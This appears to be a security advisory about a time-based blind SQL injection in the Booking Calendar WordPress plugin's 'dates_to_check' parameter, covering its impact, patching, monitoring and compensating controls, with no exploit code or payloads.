A high-severity vulnerability has been identified in the Booking Calendar plugin for WordPress. This flaw could allow an unauthenticated attacker to steal sensitive information from the website's database, including user credentials and customer data, by sending specially crafted requests. Organizations using this plugin are at risk of a data breach and should apply the recommended updates immediately.

The vulnerability is a time-based blind SQL Injection. The 'dates_to_check' parameter within the plugin does not properly sanitize user-supplied input before using it in a database query. An attacker can submit malicious SQL commands that cause the database to pause for a specific amount of time depending on whether a condition is true or false, allowing them to slowly exfiltrate data from the database one character at a time by measuring the server's response time.

This vulnerability is rated as High severity with a CVSS score of 7.5. Successful exploitation could lead to a complete compromise of the database's confidentiality. Potential consequences include the theft of sensitive customer information, user login credentials, and other proprietary business data. Such a data breach could result in significant reputational damage, financial loss from regulatory fines (e.g., GDPR, CCPA), and the cost of incident response and customer notification.

Immediate Action: Immediately identify all WordPress instances using the Booking Calendar plugin and update it to the latest version (greater than version 10). If the plugin is no longer required for business operations, the best course of action is to deactivate and completely remove it to eliminate the attack surface.

Proactive Monitoring: Monitor web server and application logs for unusually long or complex requests targeting the Booking Calendar plugin, specifically looking for manipulation of the 'dates_to_check' parameter. Database administrators should monitor for an increase in slow queries. A Web Application Firewall (WAF) should be configured to log and block suspicious patterns indicative of SQL injection attacks.

Compensating Controls: If immediate patching is not feasible, deploy a Web Application Firewall (WAF) with a robust ruleset to detect and block SQL injection attempts. Restrict database user permissions to the absolute minimum required for the plugin to function (principle of least privilege). Additionally, consider restricting access to pages using the plugin's functionality to only trusted IP ranges if possible.

Public Exploit Available: false

Given the High severity rating (CVSS 7.5) and the direct risk of data exfiltration, it is strongly recommended that organizations treat this vulnerability as a critical priority. All instances of the affected Booking Calendar plugin must be patched or removed without delay. Although this CVE is not currently on the CISA KEV list, its potential impact on data confidentiality warrants immediate attention to prevent a potentially damaging security incident.